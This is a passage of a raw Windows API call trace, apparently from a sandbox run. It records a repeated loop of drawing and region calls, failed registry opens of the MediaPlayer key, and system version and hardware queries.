lpPaint=0x1817cc) returned 0x0 [0088.334] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.334] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.334] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.334] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.334] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.334] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x870401d6 [0088.334] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x890401d3 [0088.334] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104151e [0088.335] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104151f [0088.335] CombineRgn (hrgnDst=0x104151e, hrgnSrc1=0x870401d6, hrgnSrc2=0x890401d3, iMode=1) returned 1 [0088.335] CombineRgn (hrgnDst=0x104151f, hrgnSrc1=0x870401d6, hrgnSrc2=0x890401d3, iMode=4) returned 2 [0088.335] CreateSolidBrush (color=0xff) returned 0x210151d [0088.335] CreateSolidBrush (color=0xff0000) returned 0x1101520 [0088.335] DeleteObject (ho=0x1101520) returned 1 [0088.335] DeleteObject (ho=0x890401d3) returned 1 [0088.335] DeleteObject (ho=0x870401d6) returned 1 [0088.335] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.335] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.335] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.335] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.335] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.335] BeginPath (hdc=0x0) returned 0 [0088.335] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.335] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.335] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.335] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.335] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.335] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.335] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.335] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.335] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8a0401d3 [0088.335] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x880401d6 [0088.335] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041521 [0088.335] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041522 [0088.335] CombineRgn (hrgnDst=0x1041521, hrgnSrc1=0x8a0401d3, hrgnSrc2=0x880401d6, iMode=1) returned 1 [0088.335] CombineRgn (hrgnDst=0x1041522, hrgnSrc1=0x8a0401d3, hrgnSrc2=0x880401d6, iMode=4) returned 2 [0088.335] CreateSolidBrush (color=0xff) returned 0x2101520 [0088.335] CreateSolidBrush (color=0xff0000) returned 0x1101523 [0088.335] DeleteObject (ho=0x1101523) returned 1 [0088.335] DeleteObject (ho=0x880401d6) returned 1 [0088.336] DeleteObject (ho=0x8a0401d3) returned 1 [0088.336] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.336] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.336] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.336] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.336] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.336] BeginPath (hdc=0x0) returned 0 [0088.336] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.336] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.336] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.336] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.336] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.336] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.336] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.336] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.336] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x890401d6 [0088.336] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8b0401d3 [0088.336] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041524 [0088.336] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041525 [0088.336] CombineRgn (hrgnDst=0x1041524, hrgnSrc1=0x890401d6, hrgnSrc2=0x8b0401d3, iMode=1) returned 1 [0088.336] CombineRgn (hrgnDst=0x1041525, hrgnSrc1=0x890401d6, hrgnSrc2=0x8b0401d3, iMode=4) returned 2 [0088.336] CreateSolidBrush (color=0xff) returned 0x2101523 [0088.336] CreateSolidBrush (color=0xff0000) returned 0x1101526 [0088.336] DeleteObject (ho=0x1101526) returned 1 [0088.336] DeleteObject (ho=0x8b0401d3) returned 1 [0088.336] DeleteObject (ho=0x890401d6) returned 1 [0088.336] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.336] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.336] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.336] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.337] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.337] BeginPath (hdc=0x0) returned 0 [0088.337] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.337] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.337] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.337] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.337] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.337] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.337] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.337] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.337] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8c0401d3 [0088.337] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8a0401d6 [0088.337] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041527 [0088.337] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041528 [0088.337] CombineRgn (hrgnDst=0x1041527, hrgnSrc1=0x8c0401d3, hrgnSrc2=0x8a0401d6, iMode=1) returned 1 [0088.337] CombineRgn (hrgnDst=0x1041528, hrgnSrc1=0x8c0401d3, hrgnSrc2=0x8a0401d6, iMode=4) returned 2 [0088.337] CreateSolidBrush (color=0xff) returned 0x2101526 [0088.337] CreateSolidBrush (color=0xff0000) returned 0x1101529 [0088.337] DeleteObject (ho=0x1101529) returned 1 [0088.337] DeleteObject (ho=0x8a0401d6) returned 1 [0088.337] DeleteObject (ho=0x8c0401d3) returned 1 [0088.337] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.337] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.337] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.337] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.337] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.337] BeginPath (hdc=0x0) returned 0 [0088.337] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.337] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.337] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.337] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.337] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.337] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.338] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.338] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.338] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8b0401d6 [0088.338] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8d0401d3 [0088.338] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104152a [0088.338] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104152b [0088.338] CombineRgn (hrgnDst=0x104152a, hrgnSrc1=0x8b0401d6, hrgnSrc2=0x8d0401d3, iMode=1) returned 1 [0088.338] CombineRgn (hrgnDst=0x104152b, hrgnSrc1=0x8b0401d6, hrgnSrc2=0x8d0401d3, iMode=4) returned 2 [0088.338] CreateSolidBrush (color=0xff) returned 0x2101529 [0088.338] CreateSolidBrush (color=0xff0000) returned 0x110152c [0088.338] DeleteObject (ho=0x110152c) returned 1 [0088.338] DeleteObject (ho=0x8d0401d3) returned 1 [0088.338] DeleteObject (ho=0x8b0401d6) returned 1 [0088.338] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.338] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.338] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.338] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.338] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.338] BeginPath (hdc=0x0) returned 0 [0088.338] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.338] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.338] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.338] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.338] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.338] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.338] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.338] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.339] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8e0401d3 [0088.339] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8c0401d6 [0088.339] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104152d [0088.339] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104152e [0088.339] CombineRgn (hrgnDst=0x104152d, hrgnSrc1=0x8e0401d3, hrgnSrc2=0x8c0401d6, iMode=1) returned 1 [0088.339] CombineRgn (hrgnDst=0x104152e, hrgnSrc1=0x8e0401d3, hrgnSrc2=0x8c0401d6, iMode=4) returned 2 [0088.339] CreateSolidBrush (color=0xff) returned 0x210152c [0088.339] CreateSolidBrush (color=0xff0000) returned 0x110152f [0088.339] DeleteObject (ho=0x110152f) returned 1 [0088.339] DeleteObject (ho=0x8c0401d6) returned 1 [0088.339] DeleteObject (ho=0x8e0401d3) returned 1 [0088.339] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.339] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.339] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.339] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.339] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.339] BeginPath (hdc=0x0) returned 0 [0088.339] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.339] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.339] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.339] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.339] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.339] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.339] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.339] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.339] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8d0401d6 [0088.339] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8f0401d3 [0088.339] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041530 [0088.339] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041531 [0088.340] CombineRgn (hrgnDst=0x1041530, hrgnSrc1=0x8d0401d6, hrgnSrc2=0x8f0401d3, iMode=1) returned 1 [0088.340] CombineRgn (hrgnDst=0x1041531, hrgnSrc1=0x8d0401d6, hrgnSrc2=0x8f0401d3, iMode=4) returned 2 [0088.340] CreateSolidBrush (color=0xff) returned 0x210152f [0088.340] CreateSolidBrush (color=0xff0000) returned 0x1101532 [0088.340] DeleteObject (ho=0x1101532) returned 1 [0088.340] DeleteObject (ho=0x8f0401d3) returned 1 [0088.340] DeleteObject (ho=0x8d0401d6) returned 1 [0088.340] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.340] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.340] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.340] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.340] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.340] BeginPath (hdc=0x0) returned 0 [0088.340] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.340] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.340] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.340] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.340] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.340] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.340] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.340] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.340] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x900401d3 [0088.340] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8e0401d6 [0088.340] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041533 [0088.340] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041534 [0088.340] CombineRgn (hrgnDst=0x1041533, hrgnSrc1=0x900401d3, hrgnSrc2=0x8e0401d6, iMode=1) returned 1 [0088.340] CombineRgn (hrgnDst=0x1041534, hrgnSrc1=0x900401d3, hrgnSrc2=0x8e0401d6, iMode=4) returned 2 [0088.340] CreateSolidBrush (color=0xff) returned 0x2101532 [0088.340] CreateSolidBrush (color=0xff0000) returned 0x1101535 [0088.341] DeleteObject (ho=0x1101535) returned 1 [0088.341] DeleteObject (ho=0x8e0401d6) returned 1 [0088.341] DeleteObject (ho=0x900401d3) returned 1 [0088.341] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.341] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.341] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.341] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.341] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.341] BeginPath (hdc=0x0) returned 0 [0088.341] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.341] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.341] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.341] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.341] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.341] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.341] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.341] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.341] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8f0401d6 [0088.341] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x910401d3 [0088.341] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041536 [0088.341] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041537 [0088.341] CombineRgn (hrgnDst=0x1041536, hrgnSrc1=0x8f0401d6, hrgnSrc2=0x910401d3, iMode=1) returned 1 [0088.341] CombineRgn (hrgnDst=0x1041537, hrgnSrc1=0x8f0401d6, hrgnSrc2=0x910401d3, iMode=4) returned 2 [0088.341] CreateSolidBrush (color=0xff) returned 0x2101535 [0088.341] CreateSolidBrush (color=0xff0000) returned 0x1101538 [0088.341] DeleteObject (ho=0x1101538) returned 1 [0088.341] DeleteObject (ho=0x910401d3) returned 1 [0088.341] DeleteObject (ho=0x8f0401d6) returned 1 [0088.341] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.341] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.342] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.342] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.342] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.342] BeginPath (hdc=0x0) returned 0 [0088.342] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.342] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.342] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.342] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.342] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.342] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.342] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.342] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.342] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x920401d3 [0088.342] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x900401d6 [0088.342] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041539 [0088.342] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104153a [0088.342] CombineRgn (hrgnDst=0x1041539, hrgnSrc1=0x920401d3, 